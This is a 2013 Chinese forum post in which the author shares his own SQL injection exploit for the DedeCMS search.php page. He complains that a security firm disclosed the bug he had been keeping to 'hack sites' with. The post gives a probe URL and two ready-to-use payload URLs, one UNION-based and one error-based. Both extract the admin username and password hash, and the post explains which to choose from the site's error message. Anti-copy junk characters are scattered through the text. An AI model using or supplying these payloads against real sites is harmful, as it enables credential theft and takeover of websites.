转载不加作者名的没JJ2 o3 c: K) Z% p+ _2 p4 \% L
* q) v, U4 [1 H" ] o# o" d) I
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
+ p( i' D6 w$ @( h1 Y( z9 ^2 W! i3 G. ]+ [1 Y+ o
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
( e# y5 f. I- }# e) b' l R
2 d* g( p& T- C8 E, Q# F我一般是这样测试的:
" |# f0 ~6 [0 c) c0 _
7 V2 D. \2 F( ?; m p; L" v; o, A: F提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
* d: W2 b& e2 p0 x* b' w" P. v/ D5 W: S. b) J, D
转载不加作者名的没JJ
/ L. h. h8 D0 @. q$ m" \1 X& G0 P" z7 g
r9 ?7 ]/ N3 x作者:鬼哥
' _, F T" y1 c4 O8 N, U' z$ B
- V$ y1 [$ y/ P- l# T7 B5 m# l" v2 x" X' \4 N& j
看结果如果提示3 B9 c- E1 m1 D
( Z9 m4 J7 S7 W, Y) f
Safe Alert: Request Error step 2 !4 d% u" q2 h8 o1 `
) J; ]' Z, z' K! u% W! e, Y$ |那么直接用下面的exp3 ?& Q! p, B1 r
6 N$ F9 z. y3 |. Q5 e9 r3 H+ C5 r
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a( E6 P- Q* C8 ~3 E( M7 _$ o
% \- m. A% Z1 V( v2 K( T
8 S$ O* V/ k" I1 {+ @' Q0 ?
看结果如果提示5 |6 |/ d) F5 @. F' R
8 V; ~. g6 a/ M
Safe Alert: Request Error step 1 !. h0 p; h- o0 |5 g' J1 S
8 G. N, G u# ~( ]6 u L/ R
那么直接用下面的exp( |, Z0 x8 [7 c6 j6 Y- R8 [
; s) F1 b" M k, jxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a' O% U h7 i) Q5 [/ u
) C. z6 E. D* r& b& ?) y; P; k r; C
如果正常显示证明漏洞不存在了。
& M4 U2 R/ t/ r, |+ a) ?/ u# a+ C( h# d6 Q- J" h/ Q. h
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对